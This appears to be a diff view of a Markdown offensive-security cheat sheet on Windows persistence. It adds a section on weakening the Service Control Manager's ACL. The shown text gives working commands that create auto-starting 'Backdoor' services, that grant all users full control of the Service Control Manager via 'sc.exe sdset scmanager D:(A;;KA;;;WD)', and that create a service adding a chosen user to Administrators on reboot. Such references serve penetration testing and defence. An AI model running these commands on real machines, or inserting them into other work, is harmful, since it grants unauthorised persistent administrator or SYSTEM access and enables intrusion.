* [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp)
|
||||
|
@ -321,7 +322,7 @@ Create a service that will start automatically or on-demand.
|
|||
```powershell
|
||||
# Powershell
|
||||
New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here." -StartupType Automatic
|
||||
sc start pentestlab
|
||||
sc start Backdoor
|
||||
|
||||
# SharPersist
|
||||
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c backdoor.exe" -n "Backdoor" -m add
|
||||
|
@ -331,6 +332,46 @@ sc create Backdoor binpath= "cmd.exe /k C:\temp\backdoor.exe" start="auto" obj="
|
|||
sc start Backdoor
|
||||
```
|
||||
|
||||
|
||||
### ServiceSecurityDescriptor
|
||||
|
||||
Allow any arbitrary non-administrative user to have full SYSTEM permissions on a machine persistently by feeding an overly permissive ACL to the service control manager with sdset.
|
||||
|
||||
**Exploit**:
|
||||
|
||||
```ps1
|
||||
sc.exe sdset <ServiceName> <ServiceSecurityDescriptor>
|
||||
```
|
||||
|
||||
The following command grants full control (`Key Access`) over the Service Control Manager to all users (represented by `WD`, which stands for "World"). In other words, it allows any user to start, stop, modify, or control services through the Service Control Manager, which can be a security risk as it opens service management to everyone on the system.
|
||||
|
||||
```ps1
|
||||
sc.exe sdset scmanager D:(A;;KA;;;WD)
|
||||
```
|
||||
|
||||
* `sc.exe`: The Service Control (sc) command is a Windows utility used for managing services.
|
||||
* `sdset`: This option sets a Security Descriptor (SD) for a service or the Service Control Manager itself. A security descriptor defines permissions and access rights to system resources.
|
||||
* `scmanager`: This is the target, referring to the Service Control Manager, which manages the services in the system.
|
||||
|
||||
The `ServiceSecurityDescriptor` is defined using the Service Descriptor Definition Language (SDDL).
|
||||
|
||||
List the permissions for `scmanager`
|
||||
|
||||
```ps1
|
||||
sc.exe sdshow scmanager
|
||||
```
|
||||
|
||||
Alternatively, you can use [zacateras/sddl-parser](https://github.com/zacateras/sddl-parser) to understand the Security Descriptor Definition Language (SDDL), e.g: `./Sddl.Parser.Console.exe "O:BAG:BAD:(A;CI;CCDCRP;;;NS)"`.
|
||||
|
||||
Abuse the weaken configuration to create a service that grants administrator privilege to a custom user `user_basic`.
|
||||
|
||||
```ps1
|
||||
sc create LPE displayName= "LPE" binPath= "C:\Windows\System32\net.exe localgroup Administrators user_basic /add" start= auto
|
||||
```
|
||||
|
||||
Then you need to wait for a reboot for the service to automatically start and grant the user with elevated privilege or any persistence mechanism you specified in the `binPath`.
|
||||
|
||||
|
||||
### Scheduled Tasks Elevated
|
||||
|
||||
Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day.
|
||||
|
@ -580,3 +621,5 @@ Set-DomainObject -Identity <target_machine> -Set @{"ms-mcs-admpwdexpirationtime"
|
|||
* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
|
||||
* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
|
||||
* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
|
||||
* [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/)
|
||||
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))
|
Loading…
Reference in New Issue